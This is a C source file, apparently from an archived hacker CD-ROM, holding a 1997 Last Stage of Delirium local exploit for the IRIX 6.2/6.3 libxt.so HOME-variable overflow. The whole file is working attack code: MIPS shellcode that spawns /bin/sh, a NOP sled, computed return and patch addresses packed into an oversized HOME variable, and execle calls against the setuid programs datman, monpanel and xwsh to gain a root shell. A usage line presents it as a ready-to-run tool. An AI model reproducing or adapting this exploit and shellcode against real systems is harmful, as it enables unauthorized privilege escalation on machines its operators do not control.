home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / irix / irx_libxt2.c < prev    next >
Encoding:
C/C++ Source or Header  |  2002-10-22  |  2.3 KB  |  74 lines

  1. /*## copyright LAST STAGE OF DELIRIUM sep 1997 poland        *://lsd-pl.net/ #*/
  2. /*## libxt.so $HOME                                                          #*/
  3.  
  4. /*   works on systems with and without a patch for libxt.so -xrm bug          */
  5. /*   installed: irix 6.2 (patch 2154), 6.3 (patch 2153)                       */
  6.  
  7. #define NOPNUM 10000
  8. #define ADRNUM 4000
  9. #define PCHNUM 3000
  10. #define ALLIGN 3
  11.  
  12. char shellcode[]=
  13.     "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
  14.     "\x24\x02\x03\xf3"    /* li      $v0,1011             */
  15.     "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
  16.     "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
  17.     "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
  18.     "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
  19.     "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
  20.     "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
  21.     "\x03\xff\xff\xcc"    /* syscall                      */
  22.     "/bin/sh"
  23. ;
  24.  
  25. char jump[]=
  26.     "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
  27.     "\x03\xe0\x00\x08"    /* jr      $ra                  */
  28. ;
  29.  
  30. char nop[]="\x24\x0f\x12\x34";
  31.  
  32. main(int argc,char **argv){
  33.     char buffer[20000],adr[4],pch[4],*b,*envp[3],display[128];
  34.     int i,n=-1;
  35.  
  36.     printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland  //lsd-pl.net/\n");
  37.     printf("libxt.so $HOME for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");
  38.  
  39.     if(argc!=3){
  40.         printf("usage: %s {datman|monpanel|xwsh} xserver:display\n",argv[0]);
  41.         exit(-1);
  42.     }
  43.  
  44.     if(!strcmp(argv[1],"datman")) n=0;
  45.     if(!strcmp(argv[1],"monpanel")) n=1;
  46.     if(!strcmp(argv[1],"xwsh")) n=2;
  47.     if(n==-1) exit(-1);
  48.  
  49.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+20260+5000+3000+4000;
  50.     *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+20260+2000+3000+31816;
  51.  
  52.     sprintf(display,"DISPLAY=%s",argv[2]);
  53.     envp[0]=buffer;
  54.     envp[1]=display;
  55.     envp[2]=0;
  56.  
  57.     b=buffer;
  58.     sprintf(buffer,"HOME=");
  59.     b+=5;
  60.     for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
  61.     for(i=0;i<ALLIGN;i++) *b++=0xff;
  62.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
  63.     for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
  64.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  65.     *b=0;
  66.  
  67.     switch(n){
  68.     case 0: execle("/usr/sbin/datman","lsd",0,envp);
  69.     case 1: execle("/usr/sbin/monpanel","lsd",0,envp);
  70.     case 2: execle("/usr/sbin/xwsh","lsd",0,envp);
  71.     }
  72. }
  73.  
  74.